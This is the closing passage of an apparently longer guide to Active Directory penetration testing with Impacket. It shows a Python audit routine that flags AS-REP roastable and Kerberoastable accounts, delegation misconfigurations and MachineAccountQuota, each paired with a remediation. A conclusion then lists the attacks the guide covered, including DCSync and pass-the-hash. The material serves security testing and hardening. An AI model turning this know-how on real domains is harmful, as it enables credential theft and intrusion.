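    if domain.get("ms-DS-MachineAccountQuota", 10) > 0:
        findings.append((domain["distinguishedName"], "MachineAccountQuota",
                         "any authenticated user can create computer accounts; set it to 0"))
    for o in objects:
        name = o["sAMAccountName"]
        uac = o["userAccountControl"]
        if uac & DONT_REQ_PREAUTH:
            findings.append((name, "AS-REP roastable", "pre-authentication disabled; re-enable it"))
        if o["objectClass"] == "user" and o.get("servicePrincipalName"):
            etypes = o.get("msDS-SupportedEncryptionTypes") or 0
            rc4_allowed = etypes == 0 or bool(etypes & (RC4_HMAC | DES_ETYPES))
            detail = "SPN on a user account; use a gMSA or a long random password"
            if rc4_allowed:
                detail += "; RC4 still accepted, restrict to AES"
            findings.append((name, "Kerberoastable", detail))
        if uac & TRUSTED_FOR_DELEGATION and not uac & SERVER_TRUST_ACCOUNT:
            findings.append((name, "Unconstrained delegation",
                             "non-DC trusted for delegation; switch to constrained delegation"))
        if o.get("msDS-AllowedToActOnBehalfOfOtherIdentity"):
            findings.append((name, "RBCD configured",
                             "review who is allowed to act on behalf of this object and who can write it"))
    return findings


if __name__ == "__main__":
    for finding in audit_directory(SAMPLE_OBJECTS, SAMPLE_DOMAIN):
        print(finding)
```

Domain controllers are exempted from the unconstrained-delegation finding because TRUSTED_FOR_DELEGATION is expected on them; every other object carrying that flag is a candidate for the constrained or resource-based form the mitigation list recommends. The web_svc record shows what a remediated service account looks like: it still carries an SPN, but with AES-only encryption types the ticket is no longer practical to crack.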

Conclusion

Impacket is an indispensable tool for AD penetration testing, enabling testers (and defenders) to identify and exploit common misconfigurations. This guide covered:

  • Enumeration (users, computers)
  • Kerberos attacks (AS-REP, Kerberoasting)
  • Delegation abuse (RBCD)
  • Credential dumping (DCSync, LAPS, PtH)
  • Shadow credentials & persistence

Author: Komal Singh is a Cyber Security Researcher and Technical Content Writer; she is an enthusiastic pentester and Security Analyst at Ignite Technologies. Contact here.